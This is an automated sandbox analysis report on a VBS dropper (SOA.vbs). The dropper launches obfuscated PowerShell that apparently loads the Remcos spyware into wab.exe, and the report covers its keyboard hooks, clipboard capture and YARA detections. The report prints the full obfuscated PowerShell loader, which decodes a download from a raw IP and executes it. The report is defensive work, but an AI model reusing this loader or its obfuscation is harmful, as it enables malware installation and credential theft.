                Source: wscript.exe, 00000000.00000003.1240291201.0000029D2C485000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/P=
                Source: wscript.exe, 00000000.00000002.1251228154.0000029D2A54E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250082631.0000029D2A53F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250082631.0000029D2A586000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250273073.0000029D2A586000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250273073.0000029D2A542000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251228154.0000029D2A586000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: wscript.exe, 00000000.00000003.1240917817.0000029D2A59B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1240544273.0000029D2C472000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241218710.0000029D2A5C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e2409bf0730a6
                Source: wscript.exe, 00000000.00000002.1251228154.0000029D2A54E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250082631.0000029D2A53F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250273073.0000029D2A542000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enh
                Source: wscript.exe, 00000000.00000003.1240917817.0000029D2A59B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241218710.0000029D2A5C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e2409bf073
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2549178536.0000000008AB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpG
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpI
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpL
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpS
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpi
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpj
                Source: powershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1714276170.00000000048D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: wab.exe | String found in binary or memory: http://www.ebuddy.com
                Source: wab.exe | String found in binary or memory: http://www.imvu.com
                Source: wab.exe | String found in binary or memory: http://www.nirsoft.net/
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 0000000E.00000002.1714276170.00000000048D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                Source: wab.exe | String found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: wab.exe | String found in binary or memory: https://www.google.com
                Source: wab.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 20_2_0041183A OpenClipboard,GetLastError,DeleteFileW | 20_2_0041183A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 20_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard | 20_2_0040987A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 20_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 20_2_004098E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 23_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 23_2_00406DFC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 23_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard | 23_2_00406E9F
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 24_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 24_2_004068B5
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 24_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard | 24_2_004072B5

                E-Banking Fraud

                barindex
                Source: Yara match | File source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Source: amsi32_7368.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 720, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
                Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 9731
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 9731
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle 
';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 49%
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00401806 NtdllDefWindowProc_W
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004018C0 NtdllDefWindowProc_W
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004016FD NtdllDefWindowProc_A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004017B7 NtdllDefWindowProc_A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00402CAC NtdllDefWindowProc_A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00402D66 NtdllDefWindowProc_A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAACCBB0F6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAACCBBEA2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0300F1F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0300FAC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0300EEA8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0300B768
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_2457B5C1
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24587194
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044B040
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0043610D
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00447310
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044A490
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040755A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0043C560
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044B610
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044D6C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004476F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044B870
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044081D
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00414957
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004079EE
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00407AEB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044AA80
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00412AA9
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00404B74
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00404B03
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044BBD8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00404BE5
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00404C76
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00415CFE
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00416D72
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00446D30
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00446D8B
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00406E8F
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00405038
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0041208C
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004050A9
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0040511A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0043C13A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004051AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00449300
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0040D322
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0044A4F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0043A5AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00413631
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00446690
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0044A730
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004398D8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004498E0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0044A886
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0043DA09
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00438D5E
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00449ED0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0041FE83
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00430F54
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_004050C2
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_004014AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00405133
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_004051A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00401246
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_0040CA46
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00405235
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_004032C8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00401689
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00402F60
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
                Source: SOA.vbs Initial sample: Strings found which are bigger than 50
                Source: amsi32_7368.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 720, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E80742000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E804B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Sarcophilus (Brassart ' Ulykke$ Abiot,gTeksto lBef eaaoElengefbBi,leduaForbruglBobinen:StikbreCvalu,arhPseudomaBew.ylel Ad,omsyPicud.vbP,lygyneKnoldbra Sexdign magere Hou,emo=Rationa Se.lout$ BondabRKontorleRie anngKlejnmaiRoentgeo Dy,kognEndocriaN nsynolaztecaniExpansisDemonstt Endetai teeplecSchizot[Con.ubs$CentuplRJebatseePe erbfgfe,esnoiFrida eoHomogranK.rtarmaT mpetelOsseousiKlinik,s Rotorst DissekiBasilisc Vizard. BlterncParisonoMispropufolletanincr tot Trad t-Festeri2Unprovi]Interco ')
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E804B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Ulykke$ Abiot,gTeksto lBef eaaoElengefbBi,leduaForbruglBobinen:StikbreCvalu,arhPseudomaBew.ylel Ad,omsyPicud.vbP,lygyneKnoldbra Sexdign magere Hou,emo=Rationa Se.lout$ BondabRKontorleRie anngKlejnmaiRoentgeo Dy,kognEndocriaN nsynolaztecaniExpansisDemonstt Endetai teeplecSchizot[Con.ubs$CentuplRJebatseePe erbfgfe,esnoiFrida eoHomogranK.rtarmaT mpetelOsseousiKlinik,s Rotorst DissekiBasilisc Vizard. BlterncParisonoMispropufolletanincr tot Trad t-Festeri2Unprovi]Interco X
                Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Ulykke$ Abiot,gTeksto lBef eaaoElengefbBi,leduaForbruglBobinen:StikbreCvalu,arhPseudomaBew.ylel Ad,omsyPicud.vbP,lygyneKnoldbra Sexdign magere Hou,emo=Rationa Se.lout$ BondabRKontorleRie anngKlejnmaiRoentgeo Dy,kognEndocriaN nsynolaztecaniExpansisDemonstt Endetai teeplecSchizot[Con.ubs$CentuplRJebatseePe erbfgfe,esnoiFrida eoHomogranK.rtarmaT mpetelOsseousiKlinik,s Rotorst DissekiBasilisc Vizard. BlterncParisonoMispropufolletanincr tot Trad t-Festeri2Unprovi]Interco
                Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@22/13@1/3
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Appelmulighed.Bes
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6I
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzzt3u25.jkb.ps1
                Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=720
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7368
                Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: wab.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: wab.exe Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: wab.exe, 00000011.00000002.2561134247.00000000249C0000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: wab.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: wab.exe Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: wab.exe Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: wab.exe Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
                Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh 